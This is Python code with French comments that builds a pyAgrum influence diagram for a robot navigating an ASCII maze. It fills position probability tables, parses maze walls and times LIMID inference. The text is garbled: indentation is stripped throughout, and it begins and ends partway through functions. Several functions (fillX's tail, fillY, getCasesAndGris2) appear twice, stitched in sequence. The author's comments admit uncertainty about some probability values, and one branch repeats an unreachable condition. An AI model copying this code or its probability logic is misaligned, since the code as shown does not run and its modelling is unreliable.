if(decisionDStageDavant==0): #decision = gauche
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
if(valeurX==valeurXStageDavant-1):
return 0.89+0.01
if(valeurX==valeurXStageDavant):
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite): #on teste en plus si on peut aller à droite pour savoir si on peut mettre une proba dessus
return 0.01
else:
if(valeurX==valeurXStageDavant-1): #(je sais que c'est de base à 0 mais je garde pour la compréhension du code)
return 0
if(valeurX==valeurXStageDavant):
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
#-----------------------
if(decisionDStageDavant==1): #decision = haut
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerHaut):
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.89+0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
else:
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant): #pas sur sur la proba à mettre 0.89 ou 0.089 ou 0??
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
#-----------------------
if(decisionDStageDavant==2): #decision = droite
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.089
if(valeurX==valeurXStageDavant+1):
return 0.01+0.89
else:
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant): #pas sur sur la proba à mettre 0.89 ou 0.089 ou 0??
return 0.089
if(valeurX==valeurXStageDavant+1):
return 0
#-----------------------
if(decisionDStageDavant==3): #decision = bas
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas):
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.89+0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
else:
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant): #pas sur sur la proba à mettre 0.89 ou 0.089 ou 0??
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
#-----------------------
if(decisionDStageDavant==4): #decision = rester sur place
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.89
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
return 0
def fillY(I,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris):
valeurXStageDavant,valeurYStageDavant,valeurX,valeurY,decisionDStageDavant=[I.val(nomNoeud) for nomNoeud in [f"x_{i-1}",f"y_{i-1}",f"x_{i}",f"y_{i}",f"d_{i-1}"]]
"""
Méthode qui sert à déterminer quelle probabilité on introduit dans la case d'un certain tableau de potentiel d'un noeud chance correspondant à la position Y (ordonnée) du robot à un certain stage.
Entrée :
Instantiation I - correspond à une certaine case du tableau de potentiel qu'on remplit, on fait des tests dessus afin de savoir quelle probabilité donner à cette case.
Integer i - entier correspondant au stage courant.
"""
if([valeurXStageDavant,valeurYStageDavant] in gris):
return 0
if(abs(valeurX-valeurXStageDavant)>1 or abs(valeurY-valeurYStageDavant)>1):
return 0
#-----------------------
if(decisionDStageDavant==0): #decision = gauche
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
if(valeurX==valeurXStageDavant): #X n'a pas bougé
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
if(valeurX==valeurXStageDavant-1): #X a fait un pas à gauche
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.89
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu (on regarde bien valeurX pas valeurXStageDavant car X a bougé)
return 0.001
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite): #X fait pas à droite
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 1-0.001
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
#-----------------------
if(decisionDStageDavant==1): #decision = haut
if([valeurX,valeurYStageDavant] in casesOuPossibleAllerHaut): #ON REGARDE DIRECTEMENT VALEURX
if(valeurY==valeurYStageDavant-1):#Y a bougé en haut
return 0.89
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
#-----------------------
if(decisionDStageDavant==2): #decision = droit
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
if(valeurX==valeurXStageDavant): #X n'a pas bougé
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche): #X fait pas à gauche
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 1-0.001
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu (on regarde bien valeurX pas valeurXStageDavant car X a bougé)
return 0.001
if(valeurX==valeurXStageDavant+1 ): #X fait pas à droite
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.89
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
#-----------------------
if(decisionDStageDavant==3): #decision = bas
if([valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):
if(valeurY==valeurYStageDavant+1):#Y a bougé en bas
return 0.89
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
#-----------------------
if(decisionDStageDavant==4): #decision = rester sur place
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):
return 0.001
return 0
def getCasesAndGris2(maze):
"""
Fonction qui retourne deux tableau :
gris : tableau de tableau de taille deux qui est l'ensemble des coordonnées des cases grisées
cases : tableau de 3 dimensions qui stocke, pour chaque direction cardinale, pour chaque case, si on peut faire un pas dans cette
direction (c'est à dire qu'il n'y pas de mur)
convention : cases[x,y,i]=0 si il n'y a pas de mur dans la direction i quand on est dans la case x,y et cases[x,y,i]=1 sinon. i appartient à [0,1,2,3] qui correspondent à ouest,nord,est,surd respectivement.
"""
nbLignes=len(maze)
nbColonnes=len(maze[0])
cases=np.zeros((nbLignes,nbColonnes,4)) #cases est qui stocke, selon les directions, si on peut faire le pas dans la direction ou non (0 oui, 1 non)
gris=[]
for ligne in range(nbLignes):
cases[ligne,0,0]=1#quand on est sur la premiere colonne, on ne peut pas aller a gauche
cases[ligne,nbColonnes-1,2]=1#quand on est sur la deniere colonne, on ne peut pas aller a droite
for colonne in range(nbColonnes):
cases[0,colonne,1]=1#quand on est sur la premiere ligne, on ne peut pas monter
cases[nbLignes-1,colonne,3]=1#quand on est sur la derniere ligne, on ne peut pas descendre
if(maze[ligne][colonne]=="|" or maze[ligne][colonne]=="-"):
gris.append([ligne,colonne])
cases[ligne,colonne,0]=1#si on est dans un mur, on peut aller nulle part
cases[ligne,colonne,1]=1
cases[ligne,colonne,2]=1
cases[ligne,colonne,3]=1
if colonne>0 :
cases[ligne,colonne-1,2]=1 # on regarde à droite (la cases[ligne,colonne-1] est à gauche de maze[ligne][colonne] )
if ligne<nbLignes-1 :
cases[ligne+1,colonne,1]=1 #haut
if ligne>0 :
cases[ligne-1,colonne,3]=1 #bas
if colonne<nbColonnes-1 :
cases[ligne,colonne+1,0]=1 #gauche
elif maze[ligne][colonne]=="$" :
caseObj=[ligne,colonne]
return cases,gris,caseObj,nbLignes,nbColonnes
#--Code pour créer un labyrinthe, calculer la relaxation et les afficher dans un notebook
# maze=["---------",
# "-- --",
# "- - - -",
# "-- - - --",
# "- - - $-",
# "-- --",
# "---------"]
# nbStage=4
# xInitial=3
# yInitial=2
# ID=createIDRobot(nbStage,xInitial,yInitial,maze)
# gnb.showInfluenceDiagram(ID)
# ordre=[]
# for i in range(nbStage):
# ordre.append(ID.idFromName("d_"+str(i)))
# bnb=BranchAndBoundLIMIDInference(ID,ordre)
#gnb.showInfluenceDiagram(bnb.IDRelaxe)
#Fonctions pour calculer taille+temps
def run():
xInitial = 7
yInitial = 4
for level in range(2, 5):
robot = createIDRobot(level, 2, 2,maze)
start = time.time()
ie = gum.ShaferShenoyLIMIDInference(robot)
mid = time.time()
ie.makeInference()
stop = time.time()
print(f"{level} : {mid-start:10.3f}s - {stop-mid:10.3f}s")
def human_readable(n):
def div1024(x): return x//1024, x % 1024
res = ""
for s in ["o", "Ko", "Mo", "Go"]:
n, r = div1024(n)
if r > 0:
res = f"{r}{s} {res}"
if n == 0:
return res
return f"{n}To {res}"
def nbParamInClique(model, jt, n):
nb = 8 # size of python's float
for i in jt.clique(n):
nb *= model.variable(i).domainSize()
return nb
def simule():
xInitial = 7
yInitial = 4
timeInf=[]
timeJonc=[]
largeurArbre=[]
tailleMem=[]
for level in range(2, 11):
robot = createIDRobot(level, 2, 2,maze)
start = time.time()
ie = gum.ShaferShenoyLIMIDInference(robot)
mid = time.time()
jt = ie.junctionTree()
maxtw = max([len(jt.clique(n)) for n in jt.nodes()])
maxsize = max([nbParamInClique(robot, jt, n) for n in jt.nodes()])
stop = time.time()
timeInf.append(mid-start)
timeJonc.append(stop-mid)
largeurArbre.append(maxtw)
tailleMem.append(human_readable(maxsize))
print(f"{level} : {mid-start:7.3f}s - {stop-mid:7.3f}s - treewidth={maxtw} - size= {human_readable(maxsize)}")
return timeInf,timeJonc,largeurArbre,tailleMem
maze=["---------",
"-- --",
"- - - -",
"-- - - --",
"- - - $-",
"-- --",
"---------"]
nbStage=2
xInitial=3
yInitial=2
ID=createIDRobot(nbStage,xInitial,yInitial,maze)
def createLIMIDRobot(n,xInitial,yInitial,maze):
"""
permet de créer l'ID relaxé sans calculer les SIS
chances contient tous les identifiants des noeuds chance de l'ID, par convention, si l'ID est égal à
0 mod(6) --> le noeud est un x
1 mod(6) --> le noeud est un y
2 mod(6) --> le noeud est un n
3 mod(6) --> le noeud est un e
4 mod(6) --> le noeud est un s
5 mod(6) --> le noeud est un w
decision contient tous les identifiants des noeuds décisions de l'ID, par convention, si l'ID est égal à
6*n+i pour tout i appartenant à 0,...,n-1, le noeud est le noeud décision de la ième étape.
"""
"""
Méthode permettant de créer le diagramme d'influence de l'exemple du robot vu dans l'article "2013_Solving_Limited_Memory_Influence_Diagrams_Using_BranchAndBound"
Entrée :
n - nombre de stage
xInitial - coordonnée x initial où on dépose le robot
yInitial - coordonnée y initial où on dépose le robot
Sortie :
ID - le diagramme d'influence correspondant à la modélisation du problème
"""
#gris est l'ensemble des coordonnées des cases grises
cases,gris,caseObj,nbLignes,nbColonnes=getCasesAndGris2(maze)
#listes qui énumère les cases ou on peut faire un pas dans une certaine direction (càd pas de mur dans cette direction quand on est sur cette case)
casesOuPossibleAllerGauche=[]
casesOuPossibleAllerHaut=[]
casesOuPossibleAllerDroite=[]
casesOuPossibleAllerBas=[]
#constructions des listes ci-dessus
for x in range(nbLignes):
for y in range(nbColonnes):
if(cases[x,y,0]==0):
casesOuPossibleAllerGauche.append([x,y])
if(cases[x,y,1]==0):
casesOuPossibleAllerHaut.append([x,y])
if(cases[x,y,2]==0):
casesOuPossibleAllerDroite.append([x,y])
if(cases[x,y,3]==0):
casesOuPossibleAllerBas.append([x,y])
#création de l'ID
ID=gum.fastID("")
#tous les noeuds chances, regroupés selon leur stages (0 étant celui du premier stage)
chances=np.zeros((n,6))
#tous les noeuds décisions, celui à l'indice 0 étant celui du premier stage
decision=np.zeros(n)
for i in range(n):
#définition des noms, pour eviter les opérations non necessaires
x=f"x_{i}"
y=f"y_{i}"
ns=f"ns_{i}"
es=f"es_{i}"
ss=f"ss_{i}"
ws=f"ws_{i}"
d=f"d_{i}"
#Création des noeuds
#ajout noeuds position x
chances[i][0]=int(ID.addChanceNode(gum.LabelizedVariable(x,"",nbLignes),6*i))
#ajout noeuds position y
chances[i][1]=int(ID.addChanceNode(gum.LabelizedVariable(y,"",nbColonnes),6*i+1))
#ajout noeuds capteurs selon coordonnées cardinales
chances[i][2]=ID.addChanceNode(gum.LabelizedVariable(ns,"",2),6*i+2)
chances[i][3]=ID.addChanceNode(gum.LabelizedVariable(es,"",2),6*i+2+1)
chances[i][4]=ID.addChanceNode(gum.LabelizedVariable(ss,"",2),6*i+2+2)
chances[i][5]=ID.addChanceNode(gum.LabelizedVariable(ws,"",2),6*i+2+3)
#ajout noeud de décision
decision[i]=int(ID.addDecisionNode(gum.LabelizedVariable(d,"",5),i+50000))
#Creation des arcs entre x,y et les capteurs de l'étape courante
ID.addArc(x,y)
ID.addArc(x,ns)
ID.addArc(x,es)
ID.addArc(x,ss)
ID.addArc(x,ws)
ID.addArc(y,ns)
ID.addArc(y,es)
ID.addArc(y,ss)
ID.addArc(y,ws)
#Création des arcs depuis TOUS les noeuds chances des capteurs vers le noeud de décision courant
#de l'étape
stage=i
ID.addArc(int(chances[(stage)][2]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][3]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][4]),ID.idFromName(d))
ID.addArc(int(chances[(stage)][5]),ID.idFromName(d))
#Création des arcs depuis x_i-1 vers x_i et de y_i-1 vers y_i (seulement à partir de la deuxième étape)
if(i>0):
ID.addArc(f"x_{i-1}",y)
ID.addArc(f"x_{i-1}",x)
ID.addArc(f"y_{i-1}",y)
ID.addArc(f"y_{i-1}",x)
#ID.addArc(f"d_{i-1}",f"d_{i}")
#Création des arcs entre le noeud de décision de la i-1 ème étape vers x_i et y_i
ID.addArc(f"d_{i-1}",x)
ID.addArc(f"d_{i-1}",y)
#ajout potentiels des noeuds chance capteur ns es ss ws, de support {0=pas mur,1=mur}
for h in range(nbLignes):
for j in range(nbColonnes):
if([h,j] in casesOuPossibleAllerHaut):
ID.cpt(ns)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ns)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerBas):
ID.cpt(ss)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ss)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerDroite):
ID.cpt(es)[{x:h,y:j}]=[1,0]
else:
ID.cpt(es)[{x:h,y:j}]=[0,1]
if([h,j] in casesOuPossibleAllerGauche):
ID.cpt(ws)[{x:h,y:j}]=[1,0]
else:
ID.cpt(ws)[{x:h,y:j}]=[0,1]
if [h,j] in gris:
ID.cpt(ns)[{x:h,y:j}]=[0,1]
ID.cpt(es)[{x:h,y:j}]=[0,1]
ID.cpt(ss)[{x:h,y:j}]=[0,1]
ID.cpt(ws)[{x:h,y:j}]=[0,1]
"""#ajout potentiels des noeuds positions x y au premier stage
if(i==0):
ID.cpt(x)[xInitial]=1
ID.cpt(y)[{x:xInitial,y:yInitial}]=1
#ajout potentiels des noeuds positions x y aux stages qui ne sont pas le premier stage
else:
remplirID(ID,x,fillX,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)
remplirID(ID,y,fillY,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)"""
#Ajout des arcs entre le dernier noeud décision, les derniers noeuds chances x et y avec le noeud utilité
xn=f"x_{n}"
yn=f"y_{n}"
ID.addArc(int(decision[n-1]),ID.addChanceNode(gum.LabelizedVariable(xn,"",nbLignes)))
ID.addArc(int(decision[n-1]),ID.addChanceNode(gum.LabelizedVariable(yn,"",nbColonnes)))
ID.addArc(xn,yn)
ID.addUtilityNode(gum.LabelizedVariable("u","",1))
ID.addArc(xn,"u")
ID.addArc(yn,"u")
ID.addArc(f"x_{n-1}",xn)
ID.addArc(f"y_{n-1}",xn)
ID.addArc(f"x_{n-1}",yn)
ID.addArc(f"y_{n-1}",yn)
#ajout potentiels des derniers noeuds chances et du noeud d'utilité
"""remplirID(ID,xn,fillX,n,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)
remplirID(ID,yn,fillY,n,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris)"""
l=[]
ID.utility(ID.idFromName("u"))[{f"x_{n}":caseObj[0],f"y_{n}":caseObj[1]}]=1
for k in range(n):
x=f"x_{k}"
y=f"y_{k}"
l.append(x)
l.append(y)
l=l+[xn,yn]
for node in l:
for i in ID.cpt(node).loopIn():
ID.cpt(node).set(i,np.random.rand())
ID.cpt(node).normalizeAsCPT()
return ID
def remplirID(ID,NomNoeud,fonctionFill,stage,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris):
I=gum.Instantiation(ID.cpt(NomNoeud))
"""
Méthode qui sert à remplir le tableau de potentiel des noeuds positions x et y aux stages après au premier stage
Entrée :
InfluenceDiagram ID - le diagramme d'influence sur lequel trouver tous les noeuds
String NomNoeud - le nom du noeud qu'on veut remplir le tableau de potentiel
function fonctionFill - la fonction utilisée afin de remplir les cases du tableau
Integer stage - entier qui identifie le stage courant
Sortie:
void
"""
while not I.end():
ID.cpt(NomNoeud).set(I,fonctionFill(I,stage,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris))
I.inc()
def fillX(I,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris):
valeurXStageDavant,valeurYStageDavant,valeurX,decisionDStageDavant=[I.val(nomNoeud) for nomNoeud in [f"x_{i-1}",f"y_{i-1}",f"x_{i}",f"d_{i-1}"]]
"""
Méthode qui sert à déterminer quelle probabilité on introduit dans la case d'un certain tableau de potentiel d'un noeud chance correspondant à la position X (abscisse) du robot à un certain stage.
Entrée :
Instantiation I - correspond à une certaine case du tableau de potentiel qu'on remplit, on fait des tests dessus afin de savoir quelle probabilité donner à cette case.
Integer i - entier correspondant au stage courant.
"""
if([valeurXStageDavant,valeurYStageDavant] in gris):
return 0
if(abs(valeurX-valeurXStageDavant)>1):
return 0
#-----------------------
if(decisionDStageDavant==0): #decision = gauche
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
if(valeurX==valeurXStageDavant-1):
return 0.89+0.01
if(valeurX==valeurXStageDavant):
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite): #on teste en plus si on peut aller à droite pour savoir si on peut mettre une proba dessus
return 0.01
else:
if(valeurX==valeurXStageDavant-1): #(je sais que c'est de base à 0 mais je garde pour la compréhension du code)
return 0
if(valeurX==valeurXStageDavant):
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
#-----------------------
if(decisionDStageDavant==1): #decision = haut
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerHaut):
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.89+0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
else:
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant): #pas sur sur la proba à mettre 0.89 ou 0.089 ou 0??
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
#-----------------------
if(decisionDStageDavant==2): #decision = droite
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.089
if(valeurX==valeurXStageDavant+1):
return 0.01+0.89
else:
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant): #pas sur sur la proba à mettre 0.89 ou 0.089 ou 0??
return 0.089
if(valeurX==valeurXStageDavant+1):
return 0
#-----------------------
if(decisionDStageDavant==3): #decision = bas
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas):
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.89+0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
else:
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant): #pas sur sur la proba à mettre 0.89 ou 0.089 ou 0??
return 0.089
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
#-----------------------
if(decisionDStageDavant==4): #decision = rester sur place
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
return 0.01
if(valeurX==valeurXStageDavant):
return 0.89
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
return 0.01
return 0
def fillY(I,i,casesOuPossibleAllerGauche,
casesOuPossibleAllerHaut,
casesOuPossibleAllerDroite,
casesOuPossibleAllerBas,gris):
valeurXStageDavant,valeurYStageDavant,valeurX,valeurY,decisionDStageDavant=[I.val(nomNoeud) for nomNoeud in [f"x_{i-1}",f"y_{i-1}",f"x_{i}",f"y_{i}",f"d_{i-1}"]]
"""
Méthode qui sert à déterminer quelle probabilité on introduit dans la case d'un certain tableau de potentiel d'un noeud chance correspondant à la position Y (ordonnée) du robot à un certain stage.
Entrée :
Instantiation I - correspond à une certaine case du tableau de potentiel qu'on remplit, on fait des tests dessus afin de savoir quelle probabilité donner à cette case.
Integer i - entier correspondant au stage courant.
"""
if([valeurXStageDavant,valeurYStageDavant] in gris):
return 0
if(abs(valeurX-valeurXStageDavant)>1 or abs(valeurY-valeurYStageDavant)>1):
return 0
#-----------------------
if(decisionDStageDavant==0): #decision = gauche
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche):
if(valeurX==valeurXStageDavant): #X n'a pas bougé
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
if(valeurX==valeurXStageDavant-1): #X a fait un pas à gauche
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.89
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu (on regarde bien valeurX pas valeurXStageDavant car X a bougé)
return 0.001
if(valeurX==valeurXStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite): #X fait pas à droite
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 1-0.001
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
#-----------------------
if(decisionDStageDavant==1): #decision = haut
if([valeurX,valeurYStageDavant] in casesOuPossibleAllerHaut): #ON REGARDE DIRECTEMENT VALEURX
if(valeurY==valeurYStageDavant-1):#Y a bougé en haut
return 0.89
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
#-----------------------
if(decisionDStageDavant==2): #decision = droit
if([valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerDroite):
if(valeurX==valeurXStageDavant): #X n'a pas bougé
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
if(valeurX==valeurXStageDavant-1 and [valeurXStageDavant,valeurYStageDavant] in casesOuPossibleAllerGauche): #X fait pas à gauche
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 1-0.001
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu (on regarde bien valeurX pas valeurXStageDavant car X a bougé)
return 0.001
if(valeurX==valeurXStageDavant+1 ): #X fait pas à droite
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.89
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
#-----------------------
if(decisionDStageDavant==3): #decision = bas
if([valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):
if(valeurY==valeurYStageDavant+1):#Y a bougé en bas
return 0.89
if(valeurY==valeurYStageDavant):#Y n'a pas bougé
return 0.089
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):#Y a descendu
return 0.001
#-----------------------
if(decisionDStageDavant==4): #decision = rester sur place
if(valeurY==valeurYStageDavant+1 and [valeurX,valeurYStageDavant] in casesOuPossibleAllerBas):
return 0.001
return 0
def getCasesAndGris2(maze):
"""
Fonction qui retourne deux tableau :
gris : tableau de tableau de taille deux qui est l'ensemble des coordonnées des cases grisées
cases : tableau de 3 dimensions qui stocke, pour chaque direction cardinale, pour chaque case, si on peut faire un pas dans cette
direction (c'est à dire qu'il n'y pas de mur)
convention : cases[x,y,i]=0 si il n'y a pas de mur dans la direction i quand on est dans la case x,y et cases[x,y,i]=1 sinon. i appartient à [0,1,2,3] qui correspondent à ouest,nord,est,surd respectivement.
"""
nbLignes=len(maze)
nbColonnes=len(maze[0])
cases=np.zeros((nbLignes,nbColonnes,4)) #cases est qui stocke, selon les directions, si on peut faire le pas dans la direction ou non (0 oui, 1 non)
gris=[]
for ligne in range(nbLignes):
cases[ligne,0,0]=1#quand on est sur la premiere colonne, on ne peut pas aller a gauche
cases[ligne,nbColonnes-1,2]=1#quand on est sur la deniere colonne, on ne peut pas aller a droite
for colonne in range(nbColonnes):
cases[0,colonne,1]=1#quand on est sur la premiere ligne, on ne peut pas monter
cases[nbLignes-1,colonne,3]=1#quand on est sur la derniere ligne, on ne peut pas descendre
if(maze[ligne][colonne]=="|" or maze[ligne][colonne]=="-"):
gris.append([ligne,colonne])
cases[ligne,colonne,0]=1#si on est dans un mur, on peut aller nulle part
cases[ligne,colonne,1]=1
cases[ligne,colonne,2]=1
cases[ligne,colonne,3]=1
if colonne>0 :
cases[ligne,colonne-1,2]=1 # on regarde à droite (la cases[ligne,colonne-1] est à gauche de maze[ligne][colonne] )
if ligne<nbLignes-1 :
cases[ligne+1,colonne,1]=1 #haut
if ligne>0 :
cases[ligne-1,colonne,3]=1 #bas
if colonne<nbColonnes-1 :
cases[ligne,colonne+1,0]=1 #gauche
elif maze[ligne][colonne]=="$" :
caseObj=[ligne,colonne]
